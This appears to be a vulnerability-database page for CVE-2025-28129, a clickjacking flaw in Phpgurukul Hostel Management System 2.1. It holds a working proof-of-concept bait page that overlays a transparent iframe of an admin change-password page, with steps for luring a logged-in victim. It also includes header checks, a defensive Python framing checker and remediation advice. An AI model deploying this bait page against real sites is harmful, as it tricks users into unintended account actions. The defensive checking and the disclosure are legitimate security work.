Security Vulnerability Report
CVE-2025-28129 CVSS 5.4 MEDIUM

CVE-2025-28129

Published: 2025-10-06 18:15:51
Last Modified: 2025-10-21 18:40:56

Description

Phpgurukul Hostel Management System 2.1 is vulnerable to clickjacking (CWE-1021, Improper Restriction of Rendered UI Layers or Frames): its pages are served without an X-Frame-Options header or a Content-Security-Policy frame-ancestors directive, so they can be embedded in a cross-origin iframe and overlaid with decoy content.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:hostel_management_system:2.1:*:*:*:*:*:*:* - VULNERABLE
Phpgurukul Hostel Management System 2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-28129 - Phpgurukul Hostel Management System 2.1 Clickjacking PoC -->
<!-- This PoC demonstrates how the missing X-Frame-Options header lets the
     vulnerable application be embedded in a near-transparent iframe and
     overlaid with a bait element for clickjacking. -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Special Offer - Click to Claim!</title>
<style>
/* Style for the malicious page */
body {
  font-family: Arial, sans-serif;
  text-align: center;
  margin-top: 50px;
  background-color: #f0f0f0;
}
.bait {
  position: relative;
  z-index: 1;
  padding: 20px;
  background-color: #ff9900;
  color: white;
  font-size: 24px;
  font-weight: bold;
  border-radius: 10px;
  cursor: pointer;
  width: 300px;
  margin: 0 auto;
}
/* Transparent iframe overlaying the bait button */
iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  opacity: 0.0001; /* Nearly transparent */
  z-index: 2;
  border: none;
}
/* Position the iframe to align with the bait button */
.iframe-container {
  position: relative;
  width: 340px;
  height: 80px;
  margin: 20px auto;
}
</style>
</head>
<body>
<h1>Congratulations! You Won a Prize!</h1>
<p>Click the button below to claim your reward:</p>
<div class="iframe-container">
  <!-- Bait element that the user thinks they are clicking -->
  <div class="bait">CLAIM YOUR PRIZE NOW!</div>
  <!-- Vulnerable target embedded in transparent iframe -->
  <!-- Replace with the actual URL of the target action page -->
  <iframe src="http://target-hostel-system.com/admin/change-password.php"></iframe>
</div>
<p>This is a demonstration of CVE-2025-28129 clickjacking vulnerability.</p>
</body>
</html>

Verification steps:

1. Deploy the vulnerable Phpgurukul Hostel Management System 2.1.
2. Host this HTML file on an attacker-controlled web server.
3. Send the URL to a victim who is logged into the hostel management system.
4. When the victim clicks the "CLAIM YOUR PRIZE NOW!" button, they are actually clicking through to the embedded hostel system page.
5. Check the HTTP response headers of the hostel system. If both X-Frame-Options and a CSP frame-ancestors directive are missing, the site is vulnerable:

shell
curl -I http://target-hostel-system.com/
curl -I http://target-hostel-system.com/index.php

Look for the absence of all of these headers:

X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'none'
Content-Security-Policy: frame-ancestors 'self'

Two caveats when reproducing. The target-hostel-system.com host and the /admin/change-password.php path in the PoC are placeholders, not paths confirmed by the advisory; the iframe must point at a page whose clickable control lines up with the bait button. And step 3 assumes the victim's session cookie is sent to the framed page: browsers that default cookies without a SameSite attribute to Lax (Chrome and Edge) withhold the PHP session cookie from a cross-site iframe unless the application sets it with SameSite=None; Secure, so the framed page may render as logged out there even though the headers are missing. curl -I also sends a HEAD request; confirm the finding against a GET response as well, since a handler may answer HEAD differently.
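As an added example (not code from the advisory, the NullMinds write-up, or the Phpgurukul project), the following Python script performs the same framing check programmatically, using a GET request and applying the browser rule the curl check above leaves implicit: when a Content-Security-Policy frame-ancestors directive is present it overrides X-Frame-Options, and an X-Frame-Options value other than DENY or SAMEORIGIN is not enforced. The sample header sets are constructed for illustration; the URL on the command line is assumed to be a host the tester is authorized to assess.

```python
"""Check whether an HTTP response can be framed by an arbitrary origin (CWE-1021).

Added example for CVE-2025-28129; not code from the advisory or the Phpgurukul
project. The SAMPLES below are constructed header sets, not captured responses.
"""
import sys
import urllib.error
import urllib.request

# X-Frame-Options values that block cross-site framing; anything else
# (for example the obsolete ALLOW-FROM) is ignored by current browsers.
XFO_BLOCKING = ("deny", "sameorigin")
# frame-ancestors source expressions that admit any third-party origin.
OPEN_SOURCES = ("*", "http:", "https:")


def frame_ancestors_sources(policies):
    """Return one source list per CSP policy that carries frame-ancestors.

    Browsers honour only the first frame-ancestors directive within a policy,
    so a duplicate later in the same header is ignored here as well.
    """
    found = []
    for policy in policies:
        for directive in policy.split(";"):
            tokens = directive.split()
            if tokens and tokens[0].lower() == "frame-ancestors":
                found.append([t.strip("'").lower() for t in tokens[1:]])
                break
    return found


def assess_framing(headers):
    """Decide whether a third-party page may embed this response in an iframe.

    `headers` is an iterable of (name, value) pairs. Returns (framable, reason).
    CSP frame-ancestors, when present, takes precedence over X-Frame-Options,
    and every policy sent must allow the framer.
    """
    csp = [v for n, v in headers if n.lower() == "content-security-policy"]
    xfo = []
    for n, v in headers:
        if n.lower() == "x-frame-options":
            xfo.extend(p.strip().lower() for p in v.split(",") if p.strip())

    ancestors = frame_ancestors_sources(csp)
    if ancestors:
        for sources in ancestors:
            if not sources or "none" in sources:  # an empty list also means 'none'
                return False, "CSP frame-ancestors 'none'"
            if not any(s in OPEN_SOURCES for s in sources):
                return False, "CSP frame-ancestors limited to: " + " ".join(sources)
        return True, "CSP frame-ancestors admits any origin"

    if any(v in XFO_BLOCKING for v in xfo):
        return False, "X-Frame-Options: " + ", ".join(xfo)
    if xfo:
        return True, "X-Frame-Options not enforced by browsers: " + ", ".join(xfo)
    return True, "no X-Frame-Options and no CSP frame-ancestors"


def check_url(url, timeout=10):
    """GET `url`, follow redirects, and assess the final response's headers.

    A GET is used deliberately: curl -I sends HEAD, which a handler may answer
    without the headers it sets on GET. Returns (final_url, (framable, reason)).
    """
    req = urllib.request.Request(url, headers={"User-Agent": "framing-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.geturl(), assess_framing(resp.getheaders())
    except urllib.error.HTTPError as err:  # 4xx/5xx responses still carry headers
        return err.geturl(), assess_framing(err.headers.items())


# Constructed sample responses (not captured from a real deployment).
SAMPLES = {
    "bare_php": [("Content-Type", "text/html; charset=UTF-8"),
                 ("Set-Cookie", "PHPSESSID=abc123; path=/")],
    "xfo_sameorigin": [("X-Frame-Options", "SAMEORIGIN")],
    "xfo_allow_from": [("X-Frame-Options", "ALLOW-FROM https://partner.example")],
    "csp_none": [("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'")],
    "csp_open_beats_xfo": [("X-Frame-Options", "DENY"),
                           ("Content-Security-Policy", "frame-ancestors *")],
}

if __name__ == "__main__":
    if len(sys.argv) > 1:
        final_url, (framable, reason) = check_url(sys.argv[1])
        print(f"{final_url}: {'FRAMABLE' if framable else 'protected'} ({reason})")
    else:
        for name, hdrs in SAMPLES.items():
            framable, reason = assess_framing(hdrs)
            print(f"{name}: {'FRAMABLE' if framable else 'protected'} ({reason})")
```

Run it with no arguments to see the verdict for each constructed sample, or with a URL to assess a live deployment. The csp_open_beats_xfo sample is the case that a header-presence grep gets wrong: X-Frame-Options: DENY is present, yet the page is framable because the CSP frame-ancestors directive wins. The fix on the application side is to send X-Frame-Options: SAMEORIGIN together with Content-Security-Policy: frame-ancestors 'self' on every response, either from PHP before any output is written or from the web server configuration.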

References

https://github.com/NullMinds/CVE-Hunting/blob/main/Hostel%20Management%20System%20in%20PHP/Clickjacking.pdf (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-28129", "sourceIdentifier": "[email protected]", "published": "2025-10-06T18:15:51.067", "lastModified": "2025-10-21T18:40:55.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Phpgurukul Hostel Management System 2.1 is vulnerable to clickjacking."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:hostel_management_system:2.1:*:*:*:*:*:*:*", "matchCriteriaId": "6BE856ED-F173-401B-A708-FCE7FAB85178"}]}]}], "references": [{"url": "https://github.com/NullMinds/CVE-Hunting/blob/main/Hostel%20Management%20System%20in%20PHP/Clickjacking.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}